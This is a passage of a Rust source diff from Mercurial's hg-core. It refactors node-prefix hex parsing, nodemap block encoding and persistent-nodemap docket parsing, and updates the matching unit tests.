- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> { - Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|e| NodeError::from((e, hex)))? - .into()) + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { + let prefix = NodePrefix::from_hex(hex)?; + if prefix.nybbles_len() == NODE_NYBBLES_LENGTH { + Ok(Self { data: prefix.data }) + } else { + Err(FromHexError) + } } - /// Convert to hexadecimal string representation + /// `from_hex`, but for input from an internal file of the repository such + /// as a changelog or manifest entry. /// - /// To be used in FFI and I/O only, in order to facilitate future - /// changes of hash format. - pub fn encode_hex(&self) -> String { - hex::encode(self.data) + /// An error is treated as repository corruption. + pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> { + Self::from_hex(hex.as_ref()).map_err(|FromHexError| { + HgError::CorruptedRepository(format!( + "Expected a full hexadecimal node ID, found {}", + String::from_utf8_lossy(hex.as_ref()) + )) + }) } /// Provide access to binary data @@ -138,17 +167,11 @@ pub fn as_bytes(&self) -> &[u8] { &self.data } -} -impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError { - fn from(err_offender: (FromHexError, T)) -> Self { - let (err, offender) = err_offender; - let offender = String::from_utf8_lossy(offender.as_ref()).into_owned(); - match err { - FromHexError::InvalidStringLength => { - NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender) - } - _ => NodeError::HexError(err, offender), + pub fn short(&self) -> NodePrefix { + NodePrefix { + nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH, + data: self.data, } } } @@ -158,10 +181,14 @@ /// Since it can potentially come from an hexadecimal representation with /// odd length, it needs to carry around whether the last 4 bits are relevant /// or not. 
-#[derive(Debug, PartialEq)] +#[derive(Debug, PartialEq, Copy, Clone)] pub struct NodePrefix { - buf: Vec<u8>, - is_odd: bool, + /// In `1..=NODE_NYBBLES_LENGTH` + nybbles_len: u8, + /// The first `4 * length_in_nybbles` bits are used (considering bits + /// within a bytes in big-endian: most significant first), the rest + /// are zero. + data: NodeData, } impl NodePrefix { @@ -172,72 +199,42 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); - if len > NODE_NYBBLES_LENGTH { - return Err(NodeError::PrefixTooLong( - String::from_utf8_lossy(hex).to_owned().to_string(), - )); + if len > NODE_NYBBLES_LENGTH || len == 0 { + return Err(FromHexError); } - let is_odd = len % 2 == 1; - let even_part = if is_odd { &hex[..len - 1] } else { hex }; - let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|e| (e, hex))?; - - if is_odd { - let latest_char = char::from(hex[len - 1]); - let latest_nybble = latest_char.to_digit(16).ok_or_else(|| { - ( - FromHexError::InvalidHexCharacter { - c: latest_char, - index: len - 1, - }, - hex, - ) - })? as u8; - buf.push(latest_nybble << 4); + let mut data = [0; NODE_BYTES_LENGTH]; + let mut nybbles_len = 0; + for &ascii_byte in hex { + let nybble = match char::from(ascii_byte).to_digit(16) { + Some(digit) => digit as u8, + None => return Err(FromHexError), + }; + // Fill in the upper half of a byte first, then the lower half. 
+ let shift = if nybbles_len % 2 == 0 { 4 } else { 0 }; + data[nybbles_len as usize / 2] |= nybble << shift; + nybbles_len += 1; } - Ok(NodePrefix { buf, is_odd }) + Ok(Self { data, nybbles_len }) } - pub fn borrow(&self) -> NodePrefixRef { - NodePrefixRef { - buf: &self.buf, - is_odd: self.is_odd, - } - } -} - -#[derive(Clone, Debug, PartialEq)] -pub struct NodePrefixRef<'a> { - buf: &'a [u8], - is_odd: bool, -} - -impl<'a> NodePrefixRef<'a> { - pub fn len(&self) -> usize { - if self.is_odd { - self.buf.len() * 2 - 1 - } else { - self.buf.len() * 2 - } - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 + pub fn nybbles_len(&self) -> usize { + self.nybbles_len as _ } pub fn is_prefix_of(&self, node: &Node) -> bool { - if self.is_odd { - let buf = self.buf; - let last_pos = buf.len() - 1; - node.data.starts_with(buf.split_at(last_pos).0) - && node.data[last_pos] >> 4 == buf[last_pos] >> 4 - } else { - node.data.starts_with(self.buf) + let full_bytes = self.nybbles_len() / 2; + if self.data[..full_bytes] != node.data[..full_bytes] { + return false; } + if self.nybbles_len() % 2 == 0 { + return true; + } + let last = self.nybbles_len() - 1; + self.get_nybble(last) == node.get_nybble(last) } /// Retrieve the `i`th half-byte from the prefix. @@ -245,8 +242,12 @@ /// This is also the `i`th hexadecimal digit in numeric form, /// also called a [nybble](https://en.wikipedia.org/wiki/Nibble). pub fn get_nybble(&self, i: usize) -> u8 { - assert!(i < self.len()); - get_nybble(self.buf, i) + assert!(i < self.nybbles_len()); + get_nybble(&self.data, i) + } + + fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ { + (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i)) } /// Return the index first nybble that's different from `node` @@ -257,42 +258,49 @@ /// /// Returned index is as in `get_nybble`, i.e., starting at 0. 
pub fn first_different_nybble(&self, node: &Node) -> Option<usize> { - let buf = self.buf; - let until = if self.is_odd { - buf.len() - 1 - } else { - buf.len() - }; - for (i, item) in buf.iter().enumerate().take(until) { - if *item != node.data[i] { - return if *item & 0xf0 == node.data[i] & 0xf0 { - Some(2 * i + 1) - } else { - Some(2 * i) - }; - } + self.iter_nybbles() + .zip(NodePrefix::from(*node).iter_nybbles()) + .position(|(a, b)| a != b) + } +} + +impl fmt::LowerHex for NodePrefix { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + let full_bytes = self.nybbles_len() / 2; + for &byte in &self.data[..full_bytes] { + write!(f, "{:02x}", byte)? } - if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 { - Some(until * 2) - } else { - None + if self.nybbles_len() % 2 == 1 { + let last = self.nybbles_len() - 1; + write!(f, "{:x}", self.get_nybble(last))? + } + Ok(()) + } +} + +/// A shortcut for full `Node` references +impl From<&'_ Node> for NodePrefix { + fn from(node: &'_ Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } /// A shortcut for full `Node` references -impl<'a> From<&'a Node> for NodePrefixRef<'a> { - fn from(node: &'a Node) -> Self { - NodePrefixRef { - buf: &node.data, - is_odd: false, +impl From<Node> for NodePrefix { + fn from(node: Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } -impl PartialEq<Node> for NodePrefixRef<'_> { +impl PartialEq<Node> for NodePrefix { fn eq(&self, other: &Node) -> bool { - !self.is_odd && self.buf == other.data + Self::from(*other) == *self } } @@ -300,18 +308,16 @@ mod tests { use super::*; - fn sample_node() -> Node { - let mut data = [0; NODE_BYTES_LENGTH]; - data.copy_from_slice(&[ + const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef"; + const SAMPLE_NODE: Node = Node { + data: [ 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 
0xad, 0xbe, 0xef, - ]); - data.into() - } + ], + }; /// Pad an hexadecimal string to reach `NODE_NYBBLES_LENGTH` - ///check_hash - /// The padding is made with zeros + /// The padding is made with zeros. pub fn hex_pad_right(hex: &str) -> String { let mut res = hex.to_string(); while res.len() < NODE_NYBBLES_LENGTH { @@ -320,135 +326,88 @@ res } - fn sample_node_hex() -> String { - hex_pad_right("0123456789abcdeffedcba9876543210deadbeef") - } - #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node())); - - let mut short = hex_pad_right("0123"); - short.pop(); - short.pop(); - assert_eq!( - Node::from_hex(&short), - Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)), - ); - - let not_hex = hex_pad_right("012... oops"); - assert_eq!( - Node::from_hex(¬_hex), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: '.', index: 3 }, - not_hex, - )), - ); + let not_hex = "012... oops"; + let too_short = "0123"; + let too_long = format!("{}0", SAMPLE_NODE_HEX); + assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE); + assert!(Node::from_hex(not_hex).is_err()); + assert!(Node::from_hex(too_short).is_err()); + assert!(Node::from_hex(&too_long).is_err()); } #[test] fn test_node_encode_hex() { - assert_eq!(sample_node().encode_hex(), sample_node_hex()); + assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX); } #[test] - fn test_prefix_from_hex() -> Result<(), NodeError> { - assert_eq!( - NodePrefix::from_hex("0e1")?, - NodePrefix { - buf: vec![14, 16], - is_odd: true - } - ); + fn test_prefix_from_to_hex() -> Result<(), FromHexError> { + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1"); + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a"); assert_eq!( - NodePrefix::from_hex("0e1a")?, - NodePrefix { - buf: vec![14, 26], - is_odd: false - } + format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?), + SAMPLE_NODE_HEX ); - - // checking limit case - let 
node_as_vec = sample_node().data.iter().cloned().collect(); - assert_eq!( - NodePrefix::from_hex(sample_node_hex())?, - NodePrefix { - buf: node_as_vec, - is_odd: false - } - ); - Ok(()) } #[test] fn test_prefix_from_hex_errors() { - assert_eq!( - NodePrefix::from_hex("testgr"), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: 't', index: 0 }, - "testgr".to_string() - )) - ); - let mut long = NULL_NODE.encode_hex(); + assert!(NodePrefix::from_hex("testgr").is_err()); + let mut long = format!("{:x}", NULL_NODE); long.push('c'); - match NodePrefix::from_hex(&long) - .expect_err("should be refused as too long") - { - NodeError::PrefixTooLong(s) => assert_eq!(s, long), - err => panic!(format!("Should have been TooLong, got {:?}", err)), - } + assert!(NodePrefix::from_hex(&long).is_err()) } #[test] - fn test_is_prefix_of() -> Result<(), NodeError> { + fn test_is_prefix_of() -> Result<(), FromHexError> { let mut node_data = [0; NODE_BYTES_LENGTH]; node_data[0] = 0x12; node_data[1] = 0xca; let node = Node::from(node_data); - assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node)); - assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node)); Ok(()) } #[test] - fn test_get_nybble() -> Result<(), NodeError> { + fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; - assert_eq!(prefix.borrow().get_nybble(0), 13); - assert_eq!(prefix.borrow().get_nybble(7), 9); + assert_eq!(prefix.get_nybble(0), 13); + assert_eq!(prefix.get_nybble(7), 9); Ok(()) } #[test] fn test_first_different_nybble_even_prefix() { let prefix = 
NodePrefix::from_hex("12ca").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } #[test] fn test_first_different_nybble_odd_prefix() { let prefix = NodePrefix::from_hex("12c").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,31 +13,23 @@ //! is used in a more abstract context. 
use super::{ - node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision, - RevlogIndex, NULL_REVISION, + node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION, }; +use bytes_cast::{unaligned, BytesCast}; use std::cmp::max; use std::fmt; -use std::mem; +use std::mem::{self, align_of, size_of}; use std::ops::Deref; use std::ops::Index; -use std::slice; #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix(NodeError), /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<NodeError> for NodeMapError { - fn from(err: NodeError) -> Self { - NodeMapError::InvalidNodePrefix(err) - } -} - /// Mapping system from Mercurial nodes to revision numbers. /// /// ## `RevlogIndex` and `NodeMap` @@ -82,24 +74,9 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; - /// Find the unique Revision whose `Node` hexadecimal string representation - /// starts with a given prefix - /// - /// If no Revision matches the given prefix, `Ok(None)` is returned. - /// - /// If several Revisions match the given prefix, a [`MultipleResults`] - /// error is returned. - fn find_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) - } - /// Give the size of the shortest node prefix that determines /// the revision uniquely. /// @@ -114,19 +91,9 @@ fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - node_prefix: NodePrefixRef<'a>, + node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; - /// Same as `unique_prefix_len_bin`, with the hexadecimal representation - /// of the prefix as input. 
- fn unique_prefix_len_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) - } - /// Same as `unique_prefix_len_bin`, with a full `Node` as input fn unique_prefix_len_node( &self, @@ -149,7 +116,7 @@ /// Low level NodeTree [`Blocks`] elements /// /// These are exactly as for instance on persistent storage. -type RawElement = i32; +type RawElement = unaligned::I32Be; /// High level representation of values in NodeTree /// [`Blocks`](struct.Block.html) @@ -168,23 +135,24 @@ /// /// See [`Block`](struct.Block.html) for explanation about the encoding. fn from(raw: RawElement) -> Element { - if raw >= 0 { - Element::Block(raw as usize) - } else if raw == -1 { + let int = raw.get(); + if int >= 0 { + Element::Block(int as usize) + } else if int == -1 { Element::None } else { - Element::Rev(-raw - 2) + Element::Rev(-int - 2) } } } impl From<Element> for RawElement { fn from(element: Element) -> RawElement { - match element { + RawElement::from(match element { Element::None => 0, - Element::Block(i) => i as RawElement, + Element::Block(i) => i as i32, Element::Rev(rev) => -rev - 2, - } + }) } } @@ -212,42 +180,24 @@ /// represented at all, because we want an immutable empty nodetree /// to be valid. -#[derive(Copy, Clone)] -pub struct Block([u8; BLOCK_SIZE]); +const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble -/// Not derivable for arrays of length >32 until const generics are stable -impl PartialEq for Block { - fn eq(&self, other: &Self) -> bool { - self.0[..] == other.0[..] 
- } -} - -pub const BLOCK_SIZE: usize = 64; +#[derive(Copy, Clone, BytesCast, PartialEq)] +#[repr(transparent)] +pub struct Block([RawElement; ELEMENTS_PER_BLOCK]); impl Block { fn new() -> Self { - // -1 in 2's complement to create an absent node - let byte: u8 = 255; - Block([byte; BLOCK_SIZE]) + let absent_node = RawElement::from(-1); + Block([absent_node; ELEMENTS_PER_BLOCK]) } fn get(&self, nybble: u8) -> Element { - let index = nybble as usize * mem::size_of::<RawElement>(); - Element::from(RawElement::from_be_bytes([ - self.0[index], - self.0[index + 1], - self.0[index + 2], - self.0[index + 3], - ])) + self.0[nybble as usize].into() } fn set(&mut self, nybble: u8, element: Element) { - let values = RawElement::to_be_bytes(element.into()); - let index = nybble as usize * mem::size_of::<RawElement>(); - self.0[index] = values[0]; - self.0[index + 1] = values[1]; - self.0[index + 2] = values[2]; - self.0[index + 3] = values[3]; + self.0[nybble as usize] = element.into() } } @@ -295,7 +245,7 @@ /// Return `None` unless the `Node` for `rev` has given prefix in `index`. fn has_prefix_or_none( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, rev: Revision, ) -> Result<Option<Revision>, NodeMapError> { idx.node(rev) @@ -316,7 +266,7 @@ /// revision is the only one for a *subprefix* of the one being looked up. fn validate_candidate( idx: &impl RevlogIndex, - prefix: NodePrefixRef, + prefix: NodePrefix, candidate: (Option<Revision>, usize), ) -> Result<(Option<Revision>, usize), NodeMapError> { let (rev, steps) = candidate; @@ -398,16 +348,17 @@ // Transmute the `Vec<Block>` to a `Vec<u8>`. Blocks are contiguous // bytes, so this is perfectly safe. let bytes = unsafe { - // Assert that `Block` hasn't been changed and has no padding - let _: [u8; 4 * BLOCK_SIZE] = - std::mem::transmute([Block::new(); 4]); + // Check for compatible allocation layout. + // (Optimized away by constant-folding + dead code elimination.) 
+ assert_eq!(size_of::<Block>(), 64); + assert_eq!(align_of::<Block>(), 1); // /!\ Any use of `vec` after this is use-after-free. // TODO: use `into_raw_parts` once stabilized Vec::from_raw_parts( vec.as_ptr() as *mut u8, - vec.len() * BLOCK_SIZE, - vec.capacity() * BLOCK_SIZE, + vec.len() * size_of::<Block>(), + vec.capacity() * size_of::<Block>(), ) }; (readonly, bytes) @@ -442,7 +393,7 @@ /// `NodeTree`). fn lookup( &self, - prefix: NodePrefixRef, + prefix: NodePrefix, ) -> Result<(Option<Revision>, usize), NodeMapError> { for (i, visit_item) in self.visit(prefix).enumerate() { if let Some(opt) = visit_item.final_revision() { @@ -452,10 +403,7 @@ Err(NodeMapError::MultipleResults) } - fn visit<'n, 'p>( - &'n self, - prefix: NodePrefixRef<'p>, - ) -> NodeTreeVisitor<'n, 'p> { + fn visit<'n>(&'n self, prefix: NodePrefix) -> NodeTreeVisitor<'n> { NodeTreeVisitor { nt: self, prefix, @@ -613,7 +561,7 @@ amount: usize, ) -> Self { assert!(buffer.len() >= amount); - let len_in_blocks = amount / BLOCK_SIZE; + let len_in_blocks = amount / size_of::<Block>(); NodeTreeBytes { buffer, len_in_blocks, @@ -625,18 +573,17 @@ type Target = [Block]; fn deref(&self) -> &[Block] { - unsafe { - slice::from_raw_parts( - (&self.buffer).as_ptr() as *const Block, - self.len_in_blocks, - ) - } + Block::slice_from_bytes(&self.buffer, self.len_in_blocks) + // `NodeTreeBytes::new` already asserted that `self.buffer` is + // large enough. 
+ .unwrap() + .0 } } -struct NodeTreeVisitor<'n, 'p> { +struct NodeTreeVisitor<'n> { nt: &'n NodeTree, - prefix: NodePrefixRef<'p>, + prefix: NodePrefix, visit: usize, nybble_idx: usize, done: bool, @@ -649,11 +596,11 @@ element: Element, } -impl<'n, 'p> Iterator for NodeTreeVisitor<'n, 'p> { +impl<'n> Iterator for NodeTreeVisitor<'n> { type Item = NodeTreeVisitItem; fn next(&mut self) -> Option<Self::Item> { - if self.done || self.nybble_idx >= self.prefix.len() { + if self.done || self.nybble_idx >= self.prefix.nybbles_len() { return None; } @@ -718,18 +665,18 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, _shortest)| opt) } fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError> { - validate_candidate(idx, prefix.clone(), self.lookup(prefix)?) + validate_candidate(idx, prefix, self.lookup(prefix)?) .map(|(opt, shortest)| opt.map(|_rev| shortest)) } } @@ -774,13 +721,13 @@ let mut raw = [255u8; 64]; let mut counter = 0; - for val in [0, 15, -2, -1, -3].iter() { - for byte in RawElement::to_be_bytes(*val).iter() { + for val in [0_i32, 15, -2, -1, -3].iter() { + for byte in val.to_be_bytes().iter() { raw[counter] = *byte; counter += 1; } } - let block = Block(raw); + let (block, _) = Block::from_bytes(&raw).unwrap(); assert_eq!(block.get(0), Element::Block(0)); assert_eq!(block.get(1), Element::Block(15)); assert_eq!(block.get(3), Element::None); @@ -822,6 +769,10 @@ ]) } + fn hex(s: &str) -> NodePrefix { + NodePrefix::from_hex(s).unwrap() + } + #[test] fn test_nt_debug() { let nt = sample_nodetree(); @@ -840,11 +791,11 @@ pad_insert(&mut idx, 1, "1234deadcafe"); let nt = NodeTree::from(vec![block! 
{1: Rev(1)}]); - assert_eq!(nt.find_hex(&idx, "1")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "12")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1234de")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "1a")?, None); - assert_eq!(nt.find_hex(&idx, "ab")?, None); + assert_eq!(nt.find_bin(&idx, hex("1"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("12"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1234de"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("1a"))?, None); + assert_eq!(nt.find_bin(&idx, hex("ab"))?, None); // and with full binary Nodes assert_eq!(nt.find_node(&idx, idx.get(&1).unwrap())?, Some(1)); @@ -861,12 +812,12 @@ let nt = sample_nodetree(); - assert_eq!(nt.find_hex(&idx, "0"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "01"), Ok(Some(9))); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "00a"), Ok(Some(0))); - assert_eq!(nt.unique_prefix_len_hex(&idx, "00a"), Ok(Some(3))); - assert_eq!(nt.find_hex(&idx, "000"), Ok(Some(NULL_REVISION))); + assert_eq!(nt.find_bin(&idx, hex("0")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("01")), Ok(Some(9))); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("00a")), Ok(Some(0))); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("00a")), Ok(Some(3))); + assert_eq!(nt.find_bin(&idx, hex("000")), Ok(Some(NULL_REVISION))); } #[test] @@ -884,13 +835,13 @@ root: block![0: Block(1), 1:Block(3), 12: Rev(2)], masked_inner_blocks: 1, }; - assert_eq!(nt.find_hex(&idx, "10")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "c")?, Some(2)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "c")?, Some(1)); - assert_eq!(nt.find_hex(&idx, "00"), Err(MultipleResults)); - assert_eq!(nt.find_hex(&idx, "000")?, Some(NULL_REVISION)); - assert_eq!(nt.unique_prefix_len_hex(&idx, "000")?, Some(3)); - assert_eq!(nt.find_hex(&idx, "01")?, Some(9)); + assert_eq!(nt.find_bin(&idx, hex("10"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, 
hex("c"))?, Some(2)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("c"))?, Some(1)); + assert_eq!(nt.find_bin(&idx, hex("00")), Err(MultipleResults)); + assert_eq!(nt.find_bin(&idx, hex("000"))?, Some(NULL_REVISION)); + assert_eq!(nt.unique_prefix_len_bin(&idx, hex("000"))?, Some(3)); + assert_eq!(nt.find_bin(&idx, hex("01"))?, Some(9)); assert_eq!(nt.masked_readonly_blocks(), 2); Ok(()) } @@ -923,14 +874,14 @@ &self, prefix: &str, ) -> Result<Option<Revision>, NodeMapError> { - self.nt.find_hex(&self.index, prefix) + self.nt.find_bin(&self.index, hex(prefix)) } fn unique_prefix_len_hex( &self, prefix: &str, ) -> Result<Option<usize>, NodeMapError> { - self.nt.unique_prefix_len_hex(&self.index, prefix) + self.nt.unique_prefix_len_bin(&self.index, hex(prefix)) } /// Drain `added` and restart a new one @@ -1108,7 +1059,7 @@ let (_, bytes) = idx.nt.into_readonly_and_added_bytes(); // only the root block has been changed - assert_eq!(bytes.len(), BLOCK_SIZE); + assert_eq!(bytes.len(), size_of::<Block>()); // big endian for -2 assert_eq!(&bytes[4..2 * 4], [255, 255, 255, 254]); // big endian for -6 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,5 +1,7 @@ +use crate::errors::{HgError, HgResultExt}; +use crate::requirements; +use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; -use std::convert::TryInto; use std::path::{Path, PathBuf}; use super::revlog::RevlogError; @@ -13,6 +15,16 @@ // TODO: keep here more of the data from `parse()` when we need it } +#[derive(BytesCast)] +#[repr(C)] +struct DocketHeader { + uid_size: u8, + _tip_rev: unaligned::U64Be, + data_length: unaligned::U64Be, + _data_unused: unaligned::U64Be, + tip_node_size: unaligned::U64Be, +} + impl NodeMapDocket { /// Return `Ok(None)` when the caller should proceed without a persistent /// nodemap: @@ -27,83 +39,71 @@ repo: &Repo, index_path: 
&Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { + if !repo + .requirements() + .contains(requirements::NODEMAP_REQUIREMENT) + { + // If .hg/requires does not opt it, don’t try to open a nodemap + return Ok(None); + } + let docket_path = index_path.with_extension("n"); - let docket_bytes = match repo.store_vfs().read(&docket_path) { - Err(e) if e.kind() == std::io::ErrorKind::NotFound => { - return Ok(None) - } - Err(e) => return Err(RevlogError::IoError(e)), - Ok(bytes) => bytes, + let docket_bytes = if let Some(bytes) = + repo.store_vfs().read(&docket_path).io_not_found_as_none()? + { + bytes + } else { + return Ok(None); }; - let mut input = if let Some((&ONDISK_VERSION, rest)) = + let input = if let Some((&ONDISK_VERSION, rest)) = docket_bytes.split_first() { rest } else { return Ok(None); }; - let input = &mut input; - let uid_size = read_u8(input)? as usize; - let _tip_rev = read_be_u64(input)?; + /// Treat any error as a parse error + fn parse<T, E>(result: Result<T, E>) -> Result<T, RevlogError> { + result.map_err(|_| { + HgError::corrupted("nodemap docket parse error").into() + }) + } + + let (header, rest) = parse(DocketHeader::from_bytes(input))?; + let uid_size = header.uid_size as usize; // TODO: do we care about overflow for 4 GB+ nodemap files on 32-bit // systems? - let data_length = read_be_u64(input)? as usize; - let _data_unused = read_be_u64(input)?; - let tip_node_size = read_be_u64(input)? 
as usize; - let uid = read_bytes(input, uid_size)?; - let _tip_node = read_bytes(input, tip_node_size)?; - - let uid = - std::str::from_utf8(uid).map_err(|_| RevlogError::Corrupted)?; + let tip_node_size = header.tip_node_size.get() as usize; + let data_length = header.data_length.get() as usize; + let (uid, rest) = parse(u8::slice_from_bytes(rest, uid_size))?; + let (_tip_node, _rest) = + parse(u8::slice_from_bytes(rest, tip_node_size))?; + let uid = parse(std::str::from_utf8(uid))?; let docket = NodeMapDocket { data_length }; let data_path = rawdata_path(&docket_path, uid); - // TODO: use `std::fs::read` here when the `persistent-nodemap.mmap` + // TODO: use `vfs.read()` here when the `persistent-nodemap.mmap` // config is false? - match repo.store_vfs().mmap_open(&data_path) { - Ok(mmap) => { - if mmap.len() >= data_length { - Ok(Some((docket, mmap))) - } else { - Err(RevlogError::Corrupted) - } + if let Some(mmap) = repo + .store_vfs() + .mmap_open(&data_path) + .io_not_found_as_none()? + { + if mmap.len() >= data_length { + Ok(Some((docket, mmap))) + } else { + Err(HgError::corrupted("persistent nodemap too short").into()) } - Err(error) => { - if error.kind() == std::io::ErrorKind::NotFound { - Ok(None) - } else { - Err(RevlogError::IoError(error)) - } - } + } else { + // Even if .hg/requires opted in, some revlogs are deemed small + // enough to not need a persistent nodemap. + Ok(None) } } } -fn read_bytes<'a>( - input: &mut &'a [u8], - count: usize, -) -> Result<&'a [u8], RevlogError> { - if let Some(start) = input.get(..count) { - *input = &input[count..]; - Ok(start) - } else { - Err(RevlogError::Corrupted) - } -} - -fn read_u8<'a>(input: &mut &[u8]) -> Result<u8, RevlogError> { - Ok(read_bytes(input, 1)?[0]) -} - -fn read_be_u64<'a>(input: &mut &[u8]) -> Result<u64, RevlogError> { - let array = read_bytes(input, std::mem::size_of::<u64>())? 
